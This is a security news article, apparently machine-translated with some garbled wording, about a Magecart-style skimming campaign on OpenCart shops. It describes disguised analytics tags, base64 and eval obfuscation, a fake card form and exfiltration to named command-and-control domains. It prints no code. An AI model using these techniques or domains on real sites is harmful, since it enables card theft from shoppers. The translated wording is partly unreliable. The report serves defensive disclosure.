- OpenCart websites were injected in silence with malware that mimics the confidence monitoring scripts
- Script hides in analysis labels and exchange real payment forms in silence for false
- JavaScript Offered allowed the attackers to go through detection and launch the theft of credentials in real time
A new Magecart -style attack has raised concerns throughout the cyberbullying panorama, aimed at electronic commerce websites that depend on OpenCart CMS.
The attackers injected malicious javascript into destination pages, skillfully hiding their legitimate user analysis and marketing labels such as Facebook Pixel, Meta Pixel and Google Tag Manager.
C/SIDE experiments, a cybersecurity company that monitors third -party scripts and web assets to detect and prevent attacks on the client side, says that the injected code resembles a standard label fragment, but its behavior tells a different story.
SCRIPT OPSCATION AND INJECTION TECHNIQUES
This particular campaign disguises its malicious intention by coding the URL of payload using base64 and enrupted traffic through suspicious domains such as/Tagscart.shop/cdn/analytics.min.js, which makes transit detection difficult.
At first, it seems to be a standard Google Analytics or Tag Manager script, but a closer inspection reveals otherwise.
When decoding and executed, the script dynamically creates a new element, inserts it before existing scripts and silently starts additional code.
Then, the malware executes a very obfuscated code, using techniques such as hexadecimal references, matrix recombination and the evaluation function () for dynamic decoding.
The key function of this script is to inject a false credit card form during payment, designed to seem legitimate.
Once reproduced, the form captures the entry into the credit card number, the expiration date and the CVC. The listeners are attached to blur events, key and stuck, ensuring that the user entry is captured at each stage.
It is important to note that the attack is not based on the scraping of the clipboard, and users are forced to enter the details of the card manually.
After this, the data is immediately exveted through applications after two command and control domains (C2): // ultrachart[.]Shop/g.php and //hxjet.pics/g.php.
In an additional turn, the original payment form is hidden once the card information is sent, a second page then asks users to enter more details of the bank transaction, which aggravates the threat.
What stands out in this case is the unusually long delay in the use of the stolen card data, which took several months instead of the few typical days.
The report reveals that a card was used on June 18 in a payment transaction by telephone of the USA, while another received € 47.80 to an unidentified provider.
This violation shows a growing risk in SAAS -based electronic commerce, where CMS platforms such as OpenCart become soft objectives for advanced malware.
Therefore, there is a need for stronger security measures beyond basic firewalls.
Automated platforms such as C/SIDE claim to detect threats when detecting obscado JavaScript, unauthorized injections and anomalous script behavior.
As the attackers evolve, even small CMS implementations must remain attentive, and real -time monitoring and threat intelligence should no longer be optional for electronic commerce suppliers seeking to ensure the confidence of their customers.
